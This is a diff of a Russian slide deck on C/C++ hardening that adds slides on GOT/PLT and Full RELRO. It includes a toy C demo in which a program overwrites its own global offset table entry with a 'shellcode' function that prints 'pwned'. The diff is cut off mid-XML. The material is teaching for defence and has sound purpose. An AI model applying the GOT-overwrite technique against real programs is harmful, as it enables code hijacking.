--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -52,8 +52,13 @@
     <p:sldId id="303" r:id="rId46"/>
     <p:sldId id="304" r:id="rId47"/>
     <p:sldId id="305" r:id="rId48"/>
-    <p:sldId id="270" r:id="rId49"/>
-    <p:sldId id="271" r:id="rId50"/>
+    <p:sldId id="306" r:id="rId49"/>
+    <p:sldId id="307" r:id="rId50"/>
+    <p:sldId id="308" r:id="rId51"/>
+    <p:sldId id="309" r:id="rId52"/>
+    <p:sldId id="310" r:id="rId53"/>
+    <p:sldId id="270" r:id="rId54"/>
+    <p:sldId id="271" r:id="rId55"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3836,12 +3841,8 @@
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="ru-RU"/>
-              <a:t>Рандомизация расположения </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>основных сегментов программы (стека, кучи, библиотек)</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рандомизация расположения основных сегментов программы (стека, кучи, библиотек)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -12677,14 +12678,14 @@
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
+              <a:rPr lang="en-US" b="1" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>$   </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
+              <a:rPr lang="en-US" b="1" dirty="0">
                 <a:solidFill>
                   <a:srgbClr val="FF0000"/>
                 </a:solidFill>
@@ -12694,7 +12695,7 @@
               <a:t># </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
+              <a:rPr lang="ru-RU" b="1" dirty="0">
                 <a:solidFill>
                   <a:srgbClr val="FF0000"/>
                 </a:solidFill>
@@ -12704,7 +12705,7 @@
               <a:t>Получен доступ к </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
+              <a:rPr lang="en-US" b="1" dirty="0">
                 <a:solidFill>
                   <a:srgbClr val="FF0000"/>
                 </a:solidFill>
@@ -14840,7 +14841,10 @@
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Защита таблиц диспетчеризации</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (Full RELRO)</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -14904,7 +14908,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79D54F9B-D85E-4A7D-B3C8-992DF11CFA1A}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -14922,7 +14926,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Спасибо за внимание</a:t>
+              <a:t>Введение</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -14933,7 +14937,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C19D856-8E17-488B-A10C-4EB946202AAC}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -14946,16 +14950,85 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit lnSpcReduction="10000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Вопросы</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
+              <a:t>Вызовы функции из динамических библиотек делаются через специальные трамплины (PLT</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>stubs</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Функции-трамплины читают и обновляют таблицу </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GOT, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>содержащую указатели на функции</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Таблицу приходится держать в writable-сегменте и у хакеров есть возможность её скомпрометировать</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Более редкая атака чем buffer overflow</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(мне неизвестны соответствующие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CVE)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Решение (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>read-only relocations, RELRO):</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Инициализировать содержимое таблицы на старте программы и сразу пометить сегмент как readonly</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -14963,7 +15036,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195272044"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -14995,7 +15068,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85B21148-5860-44A4-AE49-C30B1B34A335}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -15012,9 +15085,10 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO</a:t>
-            </a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пример</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -15023,7 +15097,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5FFA250-9936-4C85-AAFE-41FFF9CE9603}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -15034,152 +15108,765 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="838200" y="1568824"/>
+            <a:ext cx="5257800" cy="4608139"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Информация о замерах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>#include &lt;</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>stdio.h</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>&gt;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>void shellcode() {</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>printf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>("You have </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>beeen</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t> </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в приложении</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Какие проверялись версии дистрибутивов</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как считались </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CVE, KEV</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (скрипты</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ссылки на примеры</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (Stack Clashing)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как искать проблемные программы (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>no-pie, etc.)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как запустить бенчмарки </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Отдельный слайд про </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Rust</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (таблица со сравнением)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Отдельный слайд с рекомендуемыми ссылками</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Слайд с рекомендациями</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверить дефолтные опции в дистро, решить с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Security Team </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>какие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardening</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>-методы включить в проде</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>pwned%s</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>\n", "");</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>extern void *_GLOBAL_OFFSET_TABLE_[];</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>int main() {</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  // </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>Имитируем действия хакера</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  _GLOBAL_OFFSET_TABLE_[POS] = shellcode;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  puts("Hello world!\n");</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  return 0;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7310122A-D2E5-4462-9C9F-5B2A4EF8D9A6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6414247" y="1568824"/>
+            <a:ext cx="5257800" cy="4608139"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
+            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr marL="228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="1000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="685800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2514600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="2971800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3429000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3886200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
